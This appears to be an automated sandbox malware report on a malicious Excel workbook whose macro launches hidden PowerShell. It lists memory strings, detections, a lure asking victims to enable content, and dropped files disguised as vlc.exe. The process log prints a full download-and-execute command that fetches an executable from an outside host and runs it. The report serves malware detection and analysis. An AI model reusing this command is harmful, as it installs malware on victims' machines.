Source: powershell.exe, 00000016.00000002.483459568.0000022B90060000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/License
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://cortana.ai
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://cr.office.com
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://dataservice.o365filtering.com
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://dataservice.o365filtering.com/
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://devnull.onenote.com
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://directory.services.
Source: vlc.exe.28.dr	String found in binary or memory: https://discord.com/
Source: powershell.exe, 00000015.00000002.467351207.000001F1AB300000.00000004.00000001.sdmp, kzsuoseu.exe, 0000001A.00000000.446951571.0000000000E32000.00000002.00020000.sdmp, kzsuoseu.exe, 0000001C.00000002.505256342.0000000000F42000.00000002.00020000.sdmp, kzsuoseu.exe, 0000001E.00000002.513514027.0000000000BA2000.00000002.00020000.sdmp, kzsuoseu.exe, 0000001F.00000000.504629114.0000000000332000.00000002.00020000.sdmp, kzsuoseu.exe, 00000020.00000002.513169061.0000000000512000.00000002.00020000.sdmp, vlc.exe.28.dr	String found in binary or memory: https://discord.com/4
Source: powershell.exe, 00000015.00000002.467351207.000001F1AB300000.00000004.00000001.sdmp, kzsuoseu.exe, 0000001A.00000000.446951571.0000000000E32000.00000002.00020000.sdmp, kzsuoseu.exe, 0000001C.00000002.505256342.0000000000F42000.00000002.00020000.sdmp, kzsuoseu.exe, 0000001E.00000002.513514027.0000000000BA2000.00000002.00020000.sdmp, kzsuoseu.exe, 0000001F.00000000.504629114.0000000000332000.00000002.00020000.sdmp, kzsuoseu.exe, 00000020.00000002.513169061.0000000000512000.00000002.00020000.sdmp, vlc.exe.28.dr	String found in binary or memory: https://discord.com/8
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://entitlement.diagnostics.office.com
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: powershell.exe, 00000016.00000002.461243682.0000022B80213000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: powershell.exe, 00000016.00000002.480623609.0000022B81CA4000.00000004.00000001.sdmp	String found in binary or memory: https://go.micro
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://graph.ppe.windows.net
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://graph.ppe.windows.net/
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://graph.windows.net
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://graph.windows.net/
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://incidents.diagnostics.office.com
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://lifecycle.office.com
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://login.microsoftonline.com/
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://login.windows.local
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://management.azure.com
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://management.azure.com/
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://messaging.office.com/
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://ncus-000.contentsync.
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://ncus-000.pagecontentsync.
Source: powershell.exe, 00000015.00000002.476805076.000001F1BA660000.00000004.00000001.sdmp, powershell.exe, 00000016.00000002.483459568.0000022B90060000.00000004.00000001.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://officeapps.live.com
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://onedrive.live.com
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://onedrive.live.com/embed?
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://outlook.office.com
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://outlook.office365.com
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://powerlift.acompli.net
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://settings.outlook.com
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://shell.suite.office.com:1443
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://skyapi.live.net/Activity/
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://store.office.cn/addinstemplate
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://store.office.com/addinstemplate
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://store.office.de/addinstemplate
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://store.officeppe.com/addinstemplate
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://tasks.office.com
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://templatelogging.office.com/client/log
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://web.microsoftstream.com/video/
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://wus2-000.contentsync.
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://wus2-000.pagecontentsync.
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://www.odwebp.svc.ms
Source: kzsuoseu.exe, 0000001A.00000002.511700350.00000000041C1000.00000004.00000001.sdmp, kzsuoseu.exe, 0000001C.00000002.509493809.00000000035B6000.00000004.00000001.sdmp, kzsuoseu.exe, 0000001E.00000002.512846183.0000000000402000.00000040.00000001.sdmp, kzsuoseu.exe, 00000020.00000002.512857021.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: kzsuoseu.exe, 0000001E.00000002.517410050.0000000002F81000.00000004.00000001.sdmp, kzsuoseu.exe, 00000020.00000002.517955962.00000000028D1000.00000004.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Screenshot number: 12

Screenshot OCR: Enable Content : lj, 5 6 7 " _ _ _="1 - 8 9 10 . . 11 " 12 Microsoft Excel X 13 14 ! Wa

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\Public\kzsuoseu.exe

Jump to dropped file

Detected potential crypto function

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 21_2_00007FFA18D809AB	21_2_00007FFA18D809AB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 21_2_00007FFA18D80DAA	21_2_00007FFA18D80DAA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 21_2_00007FFA18D81BAA	21_2_00007FFA18D81BAA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 21_2_00007FFA18D81C08	21_2_00007FFA18D81C08
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 22_2_00007FFA18D80BAA	22_2_00007FFA18D80BAA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 22_2_00007FFA18D81BAA	22_2_00007FFA18D81BAA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 22_2_00007FFA18D81C08	22_2_00007FFA18D81C08
Source: C:\Users\Public\kzsuoseu.exe	Code function: 26_2_015CC284	26_2_015CC284
Source: C:\Users\Public\kzsuoseu.exe	Code function: 26_2_015CE650	26_2_015CE650
Source: C:\Users\Public\kzsuoseu.exe	Code function: 26_2_015CE640	26_2_015CE640
Source: C:\Users\Public\kzsuoseu.exe	Code function: 26_2_015CFCCA	26_2_015CFCCA
Source: C:\Users\Public\kzsuoseu.exe	Code function: 28_2_032FC284	28_2_032FC284
Source: C:\Users\Public\kzsuoseu.exe	Code function: 28_2_032FE640	28_2_032FE640
Source: C:\Users\Public\kzsuoseu.exe	Code function: 28_2_032FE650	28_2_032FE650
Source: C:\Users\Public\kzsuoseu.exe	Code function: 30_2_01554800	30_2_01554800
Source: C:\Users\Public\kzsuoseu.exe	Code function: 30_2_01553D2C	30_2_01553D2C
Source: C:\Users\Public\kzsuoseu.exe	Code function: 30_2_015554F0	30_2_015554F0
Source: C:\Users\Public\kzsuoseu.exe	Code function: 30_2_01554770	30_2_01554770
Source: C:\Users\Public\kzsuoseu.exe	Code function: 30_2_015547F2	30_2_015547F2
Source: C:\Users\Public\kzsuoseu.exe	Code function: 32_2_02674800	32_2_02674800
Source: C:\Users\Public\kzsuoseu.exe	Code function: 32_2_02674710	32_2_02674710

Document contains an embedded VBA macro which executes code when the document is opened / closed

Source: x2hGv.xls

OLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)

Document contains embedded VBA macros

Source: x2hGv.xls

OLE indicator, VBA macros: true

Dropped file seen in connection with other malware

Source: Joe Sandbox View	Dropped File: C:\Users\Public\kzsuoseu.exe BE48A66B718F94C2379453FF845E0047504573E3C0E1A9F7AB3011DAB1C06B57
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe BE48A66B718F94C2379453FF845E0047504573E3C0E1A9F7AB3011DAB1C06B57

PE file contains strange resources

Source: kzsuoseu.exe.21.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: kzsuoseu.exe.21.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: kzsuoseu.exe.21.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vlc.exe.28.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vlc.exe.28.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vlc.exe.28.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Yara signature match

Source: x2hGv.xls, type: SAMPLE

Matched rule: PowerShell_in_Word_Doc date = 2017-06-27, author = Florian Roth, description = Detects a powershell and bypass keyword in a Word document, reference = Internal Research - ME, license = https://creativecommons.org/licenses/by-nc/4.0/, score = 4fd4a7b5ef5443e939015276fc4bf8ffa6cf682dd95845ef10fdf8158fdd8905

Source: kzsuoseu.exe.21.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: vlc.exe.28.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.evad.winXLS@17/13@3/2

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5164:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5160:120:WilError_01

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\Public\kzsuoseu.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\Public\kzsuoseu.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\Public\kzsuoseu.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\Public\kzsuoseu.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ' & { iwr http://sparepartiran.com/js/2Q/0mrxdv.exe -OutFile C:\Users\Public\kzsuoseu.exe}; & {Start-Process -FilePath 'C:\Users\Public\kzsuoseu.exe'}'
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ' & { iwr http://sparepartiran.com/js/2Q/0mrxdv.exe -OutFile C:\Users\Public\kzsuoseu.exe}; & {Start-Process -FilePath 'C:\Users\Public\kzsuoseu.exe'}'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\Public\kzsuoseu.exe 'C:\Users\Public\kzsuoseu.exe'
Source: unknown	Process created: C:\Users\Public\kzsuoseu.exe 'C:\Users\Public\kzsuoseu.exe'
Source: unknown	Process created: C:\Users\Public\kzsuoseu.exe C:\Users\Public\kzsuoseu.exe
Source: unknown	Process created: C:\Users\Public\kzsuoseu.exe C:\Users\Public\kzsuoseu.exe
Source: unknown	Process created: C:\Users\Public\kzsuoseu.exe C:\Users\Public\kzsuoseu.exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\Public\kzsuoseu.exe 'C:\Users\Public\kzsuoseu.exe'	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\Public\kzsuoseu.exe 'C:\Users\Public\kzsuoseu.exe'	Jump to behavior
Source: C:\Users\Public\kzsuoseu.exe	Process created: C:\Users\Public\kzsuoseu.exe C:\Users\Public\kzsuoseu.exe	Jump to behavior
Source: C:\Users\Public\kzsuoseu.exe	Process created: C:\Users\Public\kzsuoseu.exe C:\Users\Public\kzsuoseu.exe	Jump to behavior
Source: C:\Users\Public\kzsuoseu.exe	Process created: C:\Users\Public\kzsuoseu.exe C:\Users\Public\kzsuoseu.exe	Jump to behavior

Source: C:\Users\Public\kzsuoseu.exe	Code function: 26_2_015CFA10 push esp; iretd	26_2_015CFA11
Source: C:\Users\Public\kzsuoseu.exe	Code function: 26_2_015CFAE4 pushfd ; iretd	26_2_015CFAE5
Source: C:\Users\Public\kzsuoseu.exe	Code function: 28_2_032FFA10 push esp; iretd	28_2_032FFA11
Source: C:\Users\Public\kzsuoseu.exe	Code function: 28_2_032FFAE4 pushfd ; iretd	28_2_032FFAE5

Source: initial sample	Static PE information: section name: .text entropy: 7.96407261365
Source: initial sample	Static PE information: section name: .text entropy: 7.96407261365

Source: kzsuoseu.exe.21.dr, yfREwUKaTD0wPBlkBE/vf8L954yCm8LZ54oRw.cs	High entropy of concatenated method names: '.ctor', 'vf84L95yC', 'e8LKZ54oR', 'xMffREwUa', 'Dispose', 'JD0bwPBlk', 'S7OVrxUB62AQ3I1qks', 'GncbsTPSNfAE8TIK6D', 'aUtu5VweCAV0DnnIK0', 'bo6cX3rUYkkkvFMWem'
Source: kzsuoseu.exe.21.dr, VJd1TQFmRcd4tLjE5x/AyHZGMmym37msV77u2.cs	High entropy of concatenated method names: 'D779u2QJd', 'HTQImRcd4', 'ULj7E5xy9', 'Kcgak04k9', 'xYWHES7UA', 'XNwJ4MWZ0', '.ctor', '.cctor', 'B3LXdL43xMwIjd8BJx', 'nLyOVHVla4P0mkCAhk'
Source: 26.2.kzsuoseu.exe.e30000.0.unpack, yfREwUKaTD0wPBlkBE/vf8L954yCm8LZ54oRw.cs	High entropy of concatenated method names: '.ctor', 'vf84L95yC', 'e8LKZ54oR', 'xMffREwUa', 'Dispose', 'JD0bwPBlk', 'S7OVrxUB62AQ3I1qks', 'GncbsTPSNfAE8TIK6D', 'aUtu5VweCAV0DnnIK0', 'bo6cX3rUYkkkvFMWem'
Source: 26.2.kzsuoseu.exe.e30000.0.unpack, VJd1TQFmRcd4tLjE5x/AyHZGMmym37msV77u2.cs	High entropy of concatenated method names: 'D779u2QJd', 'HTQImRcd4', 'ULj7E5xy9', 'Kcgak04k9', 'xYWHES7UA', 'XNwJ4MWZ0', '.ctor', '.cctor', 'B3LXdL43xMwIjd8BJx', 'nLyOVHVla4P0mkCAhk'
